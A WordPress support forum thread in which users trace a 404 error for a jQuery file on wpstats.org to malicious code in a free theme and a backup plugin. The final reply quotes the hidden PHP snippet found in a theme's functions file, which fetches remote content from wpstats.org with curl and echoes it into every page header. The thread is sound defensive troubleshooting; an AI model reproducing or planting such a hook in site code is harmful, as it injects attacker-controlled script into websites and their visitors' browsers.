Viewing 8 replies - 1 through 8 (of 8 total)
  • Hi. Same error here. What could be? Help please.
    I read some about hacking thing. Is that it?

    Hi ykchow,

    The error is caused by the jquery file not existing in the domain name wpstats.org, however you may want to check out this article as well regarding the spammy issue with wpstats.org.
    http://blog.sucuri.net/2012/05/wpstats-org-spam-and-a-fake-advanced-search-plugin.html

    I’ve got 2 error messages today.

    Warning: current() expects parameter 1 to be array, string given in /home/shop24/public_html/lucasperformance.com/wp-content/themes/yoo_enterprise_wp/warp/systems/wordpress.3.0/helpers/system.php on line 224

    and

    404 Not Found
    The server can not find the requested page:
    http://www.wpstats.org/jquery-1.6.3.min.js (port 80)
    Please forward this error screen to http://www.wpstats.org’s WebMaster.

    please help me.

    @sequeira: As per the Forum Welcome, please post your own topic. Posting in an existing topic prevents us from being able to track issues by topic. Added to which, your problem – despite any similarity in symptoms – is likely to be completely different.

    thanks and sorry

    Jacob

    (@jake33)

    WCBRS 2019 Contributor

    I’ve got the same error as ykchow. I’ve searched theme and plugin files but can’t find the offending URL anywhere. Unfortunately I’ve not got phpmyadmin so can’t search the database..

    Any luck solving this?

    Jacob

    (@jake33)

    WCBRS 2019 Contributor

    Ha! Found it. It seems my search wasn’t working, I found the url in a plugin ‘WordPress Database Backup’ – their website is down as well:

    http://www.wordpressconnect.net/wordpress-database-backup-plugin/

    Just removing the plugin worked fine. Oddly I can’t find the wordpress plugin page..

    Hope this helps.

    Hi All,

    Hope you doing well,

    I also found the same issue and in my case I found some code in my function file under the theme folder.

    if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url = “http://www.wpstats.org/jquery-1.6.3.min.js”;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_theme’);}

    Actually I download that theme free from web and I already faced this king of issue so I have the idea about code.

    I just delete all this code from function file and upload the file and now my site is 100% fine.

    Don’t forget to take backup before doing this.

    All the best.

Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘The server can not find the requested page’ is closed to new replies.